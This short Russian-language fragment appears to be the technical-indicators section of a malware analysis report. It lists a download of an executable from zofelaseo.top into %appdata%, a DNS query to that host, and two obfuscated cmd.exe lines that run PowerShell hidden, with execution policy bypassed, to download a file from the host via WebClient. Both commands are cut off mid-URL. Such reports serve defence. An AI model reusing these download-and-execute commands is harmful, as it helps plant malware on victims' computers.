Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RsHeL^l^.exe -ex^e^C^u^TionP^o^L^i^cy^ BY^pA^s^s -^Nop^RO^FI^Le ^-W^i^ndoWstYl^E hIdD^EN^ (^N^ew-Ob^JECT ^Sy^st^Em.n^e^T.^w^eBclIe^nT^)^.^DOWNL^O^A^d^FIL^E(^'http://zof...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RsHeL^l^.exe -ex^e^C^u^TionP^o^L^i^cy^ BY^pA^s^s -^Nop^RO^FI^Le ^-W^i^ndoWstYl^E hIdD^EN^ (^N^ew-Ob^JECT ^Sy^st^Em.n^e^T.^w^eBclIe^nT^)^.^DOWNL^O^A^d^FIL^E(^'http://zof...' (со скрытым окном)